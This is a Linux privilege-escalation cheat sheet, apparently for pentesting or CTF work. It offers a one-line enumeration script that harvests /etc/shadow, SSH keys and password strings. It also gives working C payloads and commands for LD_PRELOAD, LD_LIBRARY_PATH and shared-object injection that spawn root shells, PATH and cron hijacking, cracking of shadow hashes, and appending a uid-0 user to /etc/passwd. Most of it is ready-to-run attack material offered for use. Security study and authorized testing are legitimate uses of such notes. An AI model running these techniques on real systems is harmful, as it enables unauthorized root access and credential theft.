Linux Manual Exploitation
Linux privesc in brief
sudo -l
Kernel Exploits
OS Exploits
Password reuse (mysql, .bash_history, 000-default.conf...)
Known binaries with suid flag and interactive (nmap)
Custom binaries with suid flag either using other binaries or with command execution
Writable files owned by root that get executed (cronjobs)
MySQL as root
Vulnerable services (chkrootkit, logrotate)
Writable /etc/passwd
Readable .bash_history
SSH private key
Listening ports on localhost
/etc/fstab
/etc/exports
/var/mail
Process as other user (root) executing something you have permissions to modify
SSH public key + Predictable PRNG
apt update hooking (Pre-Invoke)
Capabilities
File System
/root root user's home directory. Usually only accessible by root user.
/home user's directory. Good to remember user's names.
/etc system configuration files. passwd and shadow files are here.
/bin and /sbin System binaries. useful for telling you which commands you can run
/usr user's binaries and libraries can be found here,
/var Contains logs and if apache, web files can be found here.
/dev device drivers
/lib contain shared libraries
/boot files for booting the system
/mnt mount point for media
/proc contains processes marked as a file by process number
/tmp Holds temporary files and is usually globally readable/writable
One liner
Here you have an old linpeas version script in one line, just copy and paste it;)
The color filtering is not available in the one-liner (the lists are too big)
This one-liner is deprecated (I'm not going to update it any more), but it could be useful in some cases so it will remain here.
The default file where all the data is stored is: /tmp/linPE (you can change it at the beginning of the script)
file="/tmp/linPE";RED='\033[0;31m';Y='\033[0;33m';B='\033[0;34m';NC='\033[0m';rm -rf $file;echo "File: $file";echo "[+]Gathering system information...";printf $B"[*] "$RED"BASIC SYSTEM INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Operative system\n"$NC >> $file;(cat /proc/version || uname -a ) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"PATH\n"$NC >> $file;echo $PATH 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Date\n"$NC >> $file;date 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo version\n"$NC >> $file;sudo -V 2>/dev/null| grep "Sudo ver" >> $file;echo "" >> $file;printf $Y"[+] "$RED"selinux enabled?\n"$NC >> $file;sestatus 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Useful software?\n"$NC >> $file;which nc ncat netcat wget curl ping gcc make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Capabilities\n"$NC >> $file;getcap -r / 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Environment\n"$NC >> $file;(set || env) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Top and cleaned proccesses\n"$NC >> $file;ps aux 2>/dev/null | grep -v "\[" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Binary processes permissions\n"$NC >> $file;ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Services\n"$NC >> $file;(/usr/sbin/service --status-all || /sbin/chkconfig --list || /bin/rc-status) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Different processes executed during 1 min (HTB)\n"$NC >> $file;if [ "`ps -e --format cmd`" ]; then for i in {1..121}; do ps -e --format cmd >> $file.tmp1; sleep 0.5; done; sort $file.tmp1 | uniq | grep -v "\[" | sed '/^.\{500\}./d' >> $file; rm $file.tmp1; fi;echo "" >> $file;printf $Y"[+] "$RED"Proccesses binary permissions\n"$NC >> $file;ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Scheduled tasks\n"$NC >> $file;crontab -l 2>/dev/null >> $file;ls -al /etc/cron* 2>/dev/null >> $file;cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root /var/spool/anacron 2>/dev/null | grep -v "^#" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Any sd* disk in /dev?\n"$NC >> $file;ls /dev 2>/dev/null | grep -i "sd" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Storage information\n"$NC >> $file;df -h 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Unmounted file-system?\n"$NC >> $file;cat /etc/fstab 2>/dev/null | grep -v "^#" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Printer?\n"$NC >> $file;lpstat -a 2>/dev/null >> $file;echo "" >> $file;echo "" >> $file;echo "[+]Gathering network information...";printf $B"[*] "$RED"NETWORK INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Hostname, hosts and DNS\n"$NC >> $file;cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" >> $file;dnsdomainname 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Networks and neightbours\n"$NC >> $file;cat /etc/networks 2>/dev/null >> $file;(ifconfig || ip a) 2>/dev/null >> $file;iptables -L 2>/dev/null >> $file;ip n 2>/dev/null >> $file;route -n 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Ports\n"$NC >> $file;(netstat -punta || ss -t; ss -u) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Can I sniff with tcpdump?\n"$NC >> $file;timeout 1 tcpdump >> $file 2>&1;echo "" >> $file;echo "" >> $file;echo "[+]Gathering users information...";printf $B"[*] "$RED"USERS INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Me\n"$NC >> $file;(id || (whoami && groups)) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo -l without password\n"$NC >> $file;echo '' | sudo -S -l -k 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Do I have PGP keys?\n"$NC >> $file;gpg --list-keys 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Superusers\n"$NC >> $file;awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Login\n"$NC >> $file;w 2>/dev/null >> $file;last 2>/dev/null | tail >> $file;echo "" >> $file;printf $Y"[+] "$RED"Users with console\n"$NC >> $file;cat /etc/passwd 2>/dev/null | grep "sh$" >> $file;echo "" >> $file;printf $Y"[+] "$RED"All users\n"$NC >> $file;cat /etc/passwd 2>/dev/null | cut -d: -f1 >> $file;echo "" >> $file;echo "" >> $file;echo "[+]Gathering files information...";printf $B"[*] "$RED"INTERESTING FILES\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"SUID\n"$NC >> $file;find / -perm -4000 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"SGID\n"$NC >> $file;find / -perm -g=s -type f 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Files inside \$HOME (limit 20)\n"$NC >> $file;ls -la $HOME 2>/dev/null | head -n 20 >> $file;echo "" >> $file;printf $Y"[+] "$RED"20 First files of /home\n"$NC >> $file;find /home -type f 2>/dev/null | column -t | grep -v -i "/"$USER | head -n 20 >> $file;echo "" >> $file;printf $Y"[+] "$RED"Files inside .ssh directory?\n"$NC >> $file;find /home /root -name .ssh 2>/dev/null -exec ls -laR {} \; >> $file;echo "" >> $file;printf $Y"[+] "$RED"*sa_key* files\n"$NC >> $file;find / -type f -name "*sa_key*" -ls 2>/dev/null -exec ls -l {} \; >> $file;echo "" >> $file;printf $Y"[+] "$RED"Mails?\n"$NC >> $file;ls -alh /var/mail/ /var/spool/mail/ 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"NFS exports?\n"$NC >> $file;cat /etc/exports 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Hashes inside /etc/passwd? Readable /etc/shadow or /etc/master.passwd?\n"$NC >> $file;grep -v '^[^:]*:[x]' /etc/passwd 2>/dev/null >> $file;cat /etc/shadow /etc/master.passwd 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Readable /root?\n"$NC >> $file;ls -ahl /root/ 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Inside docker or lxc?\n"$NC >> $file;dockercontainer=`grep -i docker /proc/self/cgroup 2>/dev/null; find / -name "*dockerenv*" -exec ls -la {} \; 2>/dev/null`;lxccontainer=`grep -qa container=lxc /proc/1/environ 2>/dev/null`;if [ "$dockercontainer" ]; then echo "Looks like we're in a Docker container" >> $file; fi;if [ "$lxccontainer" ]; then echo "Looks like we're in a LXC container" >> $file; fi;echo "" >> $file;printf $Y"[+] "$RED"*_history, profile, bashrc, httpd.conf\n"$NC >> $file;find / -type f \( -name "*_history" -o -name "profile" -o -name "*bashrc" -o -name "httpd.conf" \) -exec ls -l {} \; 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"All hidden files (not in /sys/) (limit 100)\n"$NC >> $file;find / -type f -iname ".*" -ls 2>/dev/null | grep -v "/sys/" | head -n 100 >> $file;echo "" >> $file;printf $Y"[+] "$RED"What inside /tmp, /var/tmp, /var/backups\n"$NC >> $file;ls -a /tmp /var/tmp /var/backups 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Interesting writable Files\n"$NC >> $file;USER=`whoami`;HOME=/home/$USER;find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | grep -v '/sys/fs'| sort | uniq >> $file;for g in `groups`; do find / \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME | grep -v '/sys/fs'; done >> $file;echo "" >> $file;printf $Y"[+] "$RED"Web files?(output limited)\n"$NC >> $file;ls -alhR /var/www/ 2>/dev/null | head >> $file;ls -alhR /srv/www/htdocs/ 2>/dev/null | head >> $file;ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head >> $file;ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head >> $file;echo "" >> $file;printf $Y"[+] "$RED"Backup files?\n"$NC >> $file;find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*back*" -o -name "*bck*" \) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Find IPs inside logs\n"$NC >> $file;grep -a -R -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' /var/log/ 2>/dev/null | sort | uniq >> $file;echo "" >> $file;printf $Y"[+] "$RED"Find 'password' or 'passw' string inside /home, /var/www, /var/log, /etc\n"$NC >> $file;grep -lRi "password\|passw" /home /var/www /var/log 2>/dev/null | sort | uniq >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo -l (you need to puts the password and the result appear in console)\n"$NC >> $file;sudo -l;
Collecting Information
OS, Kernel & Hostname -
Important for kernel exploit
This will print information about operating system and kernel related information , useful in kernel exploitation
cat /etc/lsb-release
cat /etc/issue
cat /proc/version
hostname
uname -a
Users -
/etc/passwd
The passwd file stores essential user account information required during login. The passwd file is stored in the /etc directory and contains information such as the user ID, group ID, home directory and the path to the command shell. An ‘x’ character means that the encrypted password is stored in the /etc/shadow file.
The following commands can be used to retrieve information about the current user and active session:
cat /etc/passwd
id
who
w
Network Information
Network Adapters -
Will print adapter target connected with , this will give us insight of how many networks are connected with box and also information about internal network if available
ifconfig
ip a
Print Routing tables
Information related different network routes , give us information about target network reach , useful in pivoting through different networks
route
Print the active connections
This will list all connections going on withing target system , this way we can determine what services are running and will be useful for us to extract important information
netstat -antup
Print the arp entries
arp -e
/proc/net/
more discreet, all the information given by the above commands can be found by looking into the files under /proc/net, and this approach is less likely to trigger monitoring or other stuff
cat /proc/net/*
Application and Services
Retrieve information about services
knowing which services are running with root privileges can be very important for priv esc because exploiting them will result in root-level access
Service exploits can be found using Searchsploit, Google, and GitHub, just like with Kernel exploits.
ps aux
ps aux | grep root
ps aux | grep "^root"
<program> --version
<program> -v
dpkg -l | grep <program>
# On Debian-like distributions, dpkg can show installed programs and their version
rpm –qa | grep <program>
# On systems that use rpm, the following achieves the same
To retrieve installed applications
important to check if any application that is installed vulnerable to any known exploits
dpkg -l
# Debian OS
rpm -qa
# Fedora based OS
pacman -Qe
# Arch based OS
pkginfo
# SOlaris
cd /var/db/pkg/ && ls -d */*
# Gentoo
Sudoers
Make sure you pay attention to the groups to which the privileged user belongs. One especially important group is the sudo (‘Super User Do’) group. A user that is a member of the sudo group is able to execute commands in the context of the root user without providing the root password – depending on the settings in the sudoer file you may only need to enter the password for the current user or none at all.
Useful commands
# Run a program using sudo:
sudo <program>
# Run a program as a specific user:
sudo -u <username><program>
# List programs a user is allowed to run:
sudo -l
# Login as another user:
sudo -i -u scriptmanager
If you are part of group and can run specified , check https://gtfobins.github.io/ with that binary on how to liverage your access to gain root with that binary
LD_PRELOAD
LD_PRELOAD is an environment variable which can be set to the path of a shared object (.so) file.
When set, the shared object will be loaded before any others.
By creating a custom shared object and creating an init() function, we can execute code as soon as the object is loaded.
Exploitation -
1. Run sudo -l
to check if env_keepoption is set

2. Create a file (preload.c) with the following contents:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setresuid(0,0,0);
system("/bin/bash -p");
}
3. Compile preload.c to preload.so:
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c
4. Run any allowed program using sudo, while setting the LD_PRELOAD environment variable to the full path of the preload.so file:
sudo LD_PRELOAD=/tmp/preload.so apache2
LD_LIBRARY_PATH
The LD_LIBRARY_PATH environment variable contains a set of directories where shared libraries are searched for first.
The ldd
command can be used to print the shared libraries used by a program:
ldd /usr/sbin/apache2
By creating a shared library with the same name as one used by a program, and setting LD_LIBRARY_PATH to its parent directory, the program will load our shared library instead.
Exploitation -
1. Run lld
against the apache2 program file -
$ ldd /usr/sbin/apache2
linux-vdso.so.1 => (0x00007fff063ff000) ...
libcrypt.so.1 => /lib/libcrypt.so.1 (0x00007f7d4199d000)
libdl.so.2 => /lib/libdl.so.2 (0x00007f7d41798000)
libexpat.so.1 => /usr/lib/libexpat.so.1 (0x00007f7d41570000)
/lib64/ld-linux-x86-64.so.2 (0x00007f7d42e84000)
Hijacking shared objects using this method is hit or miss. Choose one from the list and try it (libcrypt.so.1 seems to work well).
2. Create a file (library_path.c) with the following contents:
#include <stdio.h>
#include <stdlib.h>
static void hijack() __attribute__((constructor));
void hijack() {
unsetenv("LD_LIBRARY_PATH");
setresuid(0,0,0);
system("/bin/bash -p");
}
3. Compile library_path.c into libcrypt.so.1:
gcc -o libcrypt.so.1 -shared -fPIC library_path.c
4. Run apache2 using sudo, while setting the LD_LIBRARY_PATH environment variable to the current path (where we compiled library_path.c):
sudo LD_LIBRARY_PATH=. apache2
Cron Jobs
Cron jobs are programs or scripts which users can schedule to run at specific times or intervals.
Cron jobs run with the security level of the user who owns them.

cat /etc/crontab
crontab -e
Weak File Permission
Misconfiguration of file permissions associated with cron jobs can lead to easy privilege escalation. If we can write to a program or script which gets run as part of a cron job, we can replace it with our own code (Most of time reverse shell)
ls -la <Path_of_file_using_in_cronjob>
PATH Environment Variable
The crontab PATH environment variable is by default set to /usr/bin:/bin
The PATH variable can be overwritten in the crontab file.
If a cron job program/script does not use an absolute path, and one of the PATH directories is writable by our user, we may be able to create a program/script with the same name as the cron job.
Steps to check -
1. First print $PATH variable to see if we can manipulate it according to our need
$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
2. Adding our own path to $PATH where we can write our own malicious binary , in this example /tmp directory
export PATH=/tmp:$PATH
it will add /tmp in front of PATH variable so now when cron job run , it will start looking for that particular binary through $PATH variable and since we put our own path in starting , it will first look for that file in that directory so we ned to put our own malicious binary with same name in our directory
3. Put your malicious binary in directory which you added to $PATH
cd /tmp
echo "/bin/bash" > <binary>
chmod +x <binary>
/etc/shadow
1. If you are able to read this file ,
head -n 1 /etc/shadow
1. Extract the root user's password
2. Save the password hash in a file
echo '$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVl XvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0' > hash.txt'
3. Crack the password hash using john
john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.t xt hash.txt
2. If you have writable permission ,
1. Generate a new SHA-512 password hash -
mkpasswd -m sha-512 newpassword
2. Edit the /etc/shadow and replace the root user’s password hash with the one we generated.
/etc/passwd
If you have writable permission -
openssl passwd "password"
1. Generate a password using opnssl
2. Edit the /etc/passwd file and enter the hash in the second field of the root user row in the place of 'x'
3. Or you can do it append a new row to it to create an alternate root user
echo "newroot:L9yLGxncbOROc:0:0:root:/root:/bin/bash" >> /etc/passwd
SUID - SGID
Finding SUID and SGID
find / -perm -4000 2>/dev/null
# Print all suid
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
# Print both SUID and SGID
If you get any unusual binary set with SUID or SGID bit , always check on https://gtfobins.github.io/ to get exploitation steps to achieve root
Shared Object Injection
When a program is executed, it will try to load the shared objects it requires.
By using a program called strace, we can track these system calls and determine whether any shared objects were not found.
If we can write to the location the program tries to open, we can create a shared object and spawn a root shell when it is loaded.
Exploitation -
1. Find SUID/SGID files on the target:
$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
...
-rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-so
...
The suid-so file should execute with root user permissions.
2. Run strace
on the SUID file:
$ strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file"
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
...
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
The libcalc.so shared object could not be found, and the program is looking in our user’s home directory, which we can write to.
3. Create the /home/user/.config directory
4. Create the file libcalc.c with the following contents:
#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject() {
setuid(0);
system("/bin/bash -p");
}
5. Compile libcalc.c into /home/user/.config/libcalc.so:
gcc -shared -fPIC -o /home/user/.config/libcalc.so libcalc.c
6. Run the SUID executable to get a root shell:
/usr/local/bin/suid-so
Path Manipulation
It is very simple to view the Path of the relevant user with help of echo command.
$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
Exploitation -
If you find that you can write inside some folder of the $PATH you may be able to escalate privileges by creating a backdoor inside the writable folder with the name of some command that is going to be executed by a different user (root ideally) and that is not loaded from a folder that is located previous to your writable folder in $PATH.
Example -
we came with one suid that executing some other binaries
find / -perm -u=s -type f 2>/dev/null


so it's executing /bin/ps binary to get process status , so what we can do is , make our own ps binary containing malicious payload and execute it with adding PATH to it
Creating malicious binary -
cd /tmp
echo "/bin/bash" > ps
chmod +x ps
Exporting current path in front -
echo $PATH
export PATH=/tmp:$PATH
it will add /tmp in front of PATH variable so now if someone execute that binary it will try to run ps
and thus our own ps binary executed giving us root
access
Passwords and configs
Finding different information
Scan for password or credential word in files
grep -rnw / -e 'password\|pass\|creds\|credentials' 2>/dev/null -i
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
Find all directories which can be written to
find / -executable -writable -type d 2> /dev/null
Find all writable files and readable files
find /etc -maxdepth 1 -writable -type f
# Search for writable files in /etc
find /etc -maxdepth 1 -readable -type f
# Search for readable files in /etc
Configs
ls -aRl /etc/ * awk '$1 ~ /w.$/' * grep -v lrwx 2>/dev/nullte
cat /etc/issue{,.net}
cat /etc/master.passwd
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons)
cat /etc/resolv.conf
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.confcda
cat /etc/inetd.conf
cat /opt/lampp/etc/httpd.conf
cat /etc/samba/smb.conf
cat /etc/openldap/ldap.conf
cat /etc/ldap/ldap.conf
cat /etc/exports
cat /etc/auto.master
cat /etc/auto_master
cat /etc/fstab
find /etc/sysconfig/ -type f -exec cat {} \;
Last updated